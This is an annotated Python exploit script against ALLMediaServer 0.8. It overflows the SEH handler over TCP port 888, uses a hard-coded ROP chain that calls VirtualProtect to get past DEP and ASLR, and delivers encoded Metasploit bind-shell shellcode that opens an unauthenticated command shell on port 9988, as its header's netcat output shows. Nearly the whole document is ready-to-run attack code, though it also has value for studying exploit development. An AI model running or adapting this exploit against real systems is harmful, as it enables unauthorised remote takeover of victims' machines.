#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Exploit: ALLMediaServer 0.8 SEH&DEP&ASLR #
# Author: b33f (Ruben Boonen) #
# OS: Win7 32-bit PRO SP1 #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications #
# /442962ff59a549701f93a6fc4bf94363-ALLMediaServer.exe #
#----------------------------------------------------------------------------------#
# root@bt:~/Desktop# python AllServ.py 192.168.111.129 #
# root@bt:~/Desktop# nc -nv 192.168.111.129 9988 #
# (UNKNOWN) [192.168.111.129] 9988 (?) open #
# Microsoft Windows [Version 6.1.7601] #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved. #
# #
# C:\Program Files\ALLMediaServer> #
#----------------------------------------------------------------------------------#
import sys, socket, struct
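# Python 2 script: every "..." literal below is a byte string (str == bytes).
# Bail out with a usage line instead of an IndexError traceback when the
# target is missing; the only argument is the target's IP/hostname.
if len(sys.argv) != 2:
    sys.stderr.write("usage: %s <target-ip>\n" % sys.argv[0])
    sys.exit(1)

# ALLMediaServer listens on TCP/888; the bind shell comes back on 9988 (see header).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10.0)  # a filtered port would otherwise block connect() forever
try:
    s.connect((sys.argv[1], 888))
except socket.error as e:
    sys.stderr.write("connect to %s:888 failed: %s\n" % (sys.argv[1], e))
    sys.exit(1)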
#------------------------------------------------
# ROP-Chain generated by Mona!, only minor edits required
# The target is very helpful: its non-ASLR DLLs provide ~250000 gadgets and there are no apparent bad characters
#------------------------------------------------
# VirtualProtect() ROP chain in mona's standard PUSHAD layout (hand-edited).
# All gadgets live in avcodec-53.dll / avformat-53.dll, whose load addresses
# are presumably fixed (no /DYNAMICBASE) -- that is what makes the hard-coded
# addresses survive ASLR on the header's Win7 test box; confirm before reuse.
#
# PUSHAD pushes EAX..EDI so that, low -> high on the stack, we get
#   EDI ESI EBP ESP EBX EDX ECX EAX
# and the trailing RETN then consumes them top-down:
#   EDI -> ROP NOP (a bare RETN)           popped and returned into first
#   ESI -> VirtualProtect()                returned into next, i.e. called
#   EBP -> 'jmp esp'                       VirtualProtect's return address
#   ESP -> lpAddress  (written by PUSHAD itself: the current stack)
#   EBX -> dwSize       = 0x201 (513 bytes)
#   EDX -> flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE)
#   ECX -> lpOldProtect (any writable dword)
#   EAX -> 0x90909090, executed as NOPs once 'jmp esp' lands on it
_ROP_CHAIN = [
    (0x6ac35756, "POP EAX # RETN                     (avformat-53.dll)"),
    (0x671ee4e0, "IAT entry holding &VirtualProtect()"),
    (0x6ac7e1ab, "MOV EAX,DWORD PTR DS:[EAX] # RETN  (avformat-53.dll) -> eax = VirtualProtect"),
    (0x66330c98, "XCHG EAX,ESI # RETN                (avcodec-53.dll)  -> esi = VirtualProtect"),
    (0x66248004, "POP EBP # RETN                     (avcodec-53.dll)"),
    (0x660c5d07, "ptr to 'jmp esp'                   (avcodec-53.dll)  -> ebp"),
    (0x665a4005, "POP EBX # RETN                     (avcodec-53.dll)"),
    (0x00000201, "dwSize: 0x201 = 513 bytes made executable            -> ebx"),
    (0x665a0aa0, "POP ECX # RETN                     (avcodec-53.dll)"),
    (0x6ad58001, "RW pointer used as lpOldProtect                      -> ecx"),
    (0x6604820b, "POP EDI # RETN                     (avcodec-53.dll)"),
    (0x6604820c, "ROP NOP (the RETN of the gadget above)               -> edi"),
    (0x6672a1e2, "POP EDX # RETN                     (avcodec-53.dll)"),
    (0x00000040, "flNewProtect: PAGE_EXECUTE_READWRITE                  -> edx"),
    (0x6ac35756, "POP EAX # RETN                     (avformat-53.dll)"),
    (0x90909090, "four NOPs                                            -> eax"),
    (0x6657f3c0, "PUSHAD # RETN                      (avcodec-53.dll)"),
]
# Serialise the chain as consecutive little-endian dwords, in order.
# b"".join keeps this a byte string on both Python 2 and 3.
rop = b"".join(struct.pack('<L', dword) for dword, _note in _ROP_CHAIN)
#------------------------------------------------
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -t c
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
#------------------------------------------------
# Stage-2 payload: msf windows/shell_bind_tcp, LPORT=9988, one pass of
# x86/shikata_ga_nai (368 bytes; see the msfpayload/msfencode line above).
#
# NOTE(review): this is an UNAUTHENTICATED bind shell. Once the exploit fires,
# anyone who can reach TCP/9988 on the target gets a shell with the server's
# privileges, not just the operator. On a real engagement prefer a reverse
# payload (windows/shell_reverse_tcp) or at least a firewall-scoped listener.
#
# The encoder's GetPC stub is the first six bytes (fcmovnb / fnstenv [esp-0xc])
# and the decoder rewrites the payload in place, so the memory it sits in must
# be writable AND executable -- exactly what the VirtualProtect() chain above
# grants with flNewProtect = 0x40.
shellcode = (
"\xdb\xc1\xd9\x74\x24\xf4\xbe\x70\x42\xed\x57\x5d\x29\xc9\xb1"
"\x56\x31\x75\x18\x83\xc5\x04\x03\x75\x64\xa0\x18\xab\x6c\xad"
"\xe3\x54\x6c\xce\x6a\xb1\x5d\xdc\x09\xb1\xcf\xd0\x5a\x97\xe3"
"\x9b\x0f\x0c\x70\xe9\x87\x23\x31\x44\xfe\x0a\xc2\x68\x3e\xc0"
"\x00\xea\xc2\x1b\x54\xcc\xfb\xd3\xa9\x0d\x3b\x09\x41\x5f\x94"
"\x45\xf3\x70\x91\x18\xcf\x71\x75\x17\x6f\x0a\xf0\xe8\x1b\xa0"
"\xfb\x38\xb3\xbf\xb4\xa0\xb8\x98\x64\xd0\x6d\xfb\x59\x9b\x1a"
"\xc8\x2a\x1a\xca\x00\xd2\x2c\x32\xce\xed\x80\xbf\x0e\x29\x26"
"\x5f\x65\x41\x54\xe2\x7e\x92\x26\x38\x0a\x07\x80\xcb\xac\xe3"
"\x30\x18\x2a\x67\x3e\xd5\x38\x2f\x23\xe8\xed\x5b\x5f\x61\x10"
"\x8c\xe9\x31\x37\x08\xb1\xe2\x56\x09\x1f\x45\x66\x49\xc7\x3a"
"\xc2\x01\xea\x2f\x74\x48\x63\x9c\x4b\x73\x73\x8a\xdc\x00\x41"
"\x15\x77\x8f\xe9\xde\x51\x48\x0d\xf5\x26\xc6\xf0\xf5\x56\xce"
"\x36\xa1\x06\x78\x9e\xc9\xcc\x78\x1f\x1c\x42\x29\x8f\xce\x23"
"\x99\x6f\xbe\xcb\xf3\x7f\xe1\xec\xfb\x55\x94\x2a\x32\x8d\xf5"
"\xdc\x37\x31\xde\x18\xb1\xd7\x4a\x31\x97\x40\xe2\xf3\xcc\x58"
"\x95\x0c\x27\xf5\x0e\x9b\x7f\x13\x88\xa4\x7f\x31\xbb\x09\xd7"
"\xd2\x4f\x42\xec\xc3\x50\x4f\x44\x8d\x69\x18\x1e\xe3\x38\xb8"
"\x1f\x2e\xaa\x59\x8d\xb5\x2a\x17\xae\x61\x7d\x70\x00\x78\xeb"
"\x6c\x3b\xd2\x09\x6d\xdd\x1d\x89\xaa\x1e\xa3\x10\x3e\x1a\x87"
"\x02\x86\xa3\x83\x76\x56\xf2\x5d\x20\x10\xac\x2f\x9a\xca\x03"
"\xe6\x4a\x8a\x6f\x39\x0c\x93\xa5\xcf\xf0\x22\x10\x96\x0f\x8a"
"\xf4\x1e\x68\xf6\x64\xe0\xa3\xb2\x95\xab\xe9\x93\x3d\x72\x78"
"\xa6\x23\x85\x57\xe5\x5d\x06\x5d\x96\x99\x16\x14\x93\xe6\x90"
"\xc5\xe9\x77\x75\xe9\x5e\x77\x5c")
#------------------------------------------------
# (1) Pivot through the SEH
# 0x6680c7b6 : {pivot 1100} # ADD ESP,440 # POP EBX # POP ESI # POP EDI # RETN [avcodec-53.dll]
# (2) ROP VirtualProtect()
# Brings us 32-bytes into our A's
# (3) Shellcode (368-bytes)
# VirtualProtect() currently marks 513 bytes (0x201, loaded into EBX above) executable; raise that value if the payload grows.
#------------------------------------------------
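# Offset from the start of the overflow area to the SEH handler slot, and the
# handler we plant there: 0x6680c7b6, the ADD ESP,440 # POP EBX # POP ESI #
# POP EDI # RETN stack pivot in avcodec-53.dll (little-endian).
SEH_OFFSET = 1044
SEH_HANDLER = b"\xB6\xC7\x80\x66"


def build_payload(rop_chain, payload, seh_offset=SEH_OFFSET, seh_handler=SEH_HANDLER):
    """Lay out the overflow buffer: filler, ROP chain, shellcode, SEH overwrite.

    Layout, low -> high address:
      "JUNK"*8     32 bytes of filler in front of the chain (the pivot lands
                   past it; the offset was found empirically by the author)
      rop_chain    VirtualProtect() chain ending in PUSHAD # RETN
      NOP*10       slack between the chain and the decoder stub
      payload      encoded shellcode
      'A' padding  fills up to seh_offset so the handler slot lines up
      seh_handler  4-byte SEH handler overwrite (the stack-pivot gadget)
      'X'*100      trailing bytes that run the copy past the SEH record

    Raises ValueError when chain + NOPs + shellcode exceed seh_offset: the
    original arithmetic went negative there, producing an empty pad and a
    silently misaligned SEH overwrite.
    """
    stage = rop_chain + b"\x90" * 10 + payload
    if len(stage) > seh_offset:
        raise ValueError("ROP chain + shellcode is %d bytes, at most %d fit before the SEH slot"
                         % (len(stage), seh_offset))
    return (b"JUNK" * 8 + stage + b"A" * (seh_offset - len(stage))
            + seh_handler + b"X" * 100)


# Guarded so the layout helper can be imported/tested without firing the exploit.
if __name__ == "__main__":
    overflow = build_payload(rop, shellcode)
    try:
        s.sendall(overflow)  # send() may return after a partial write; sendall() pushes it all
    finally:
        s.close()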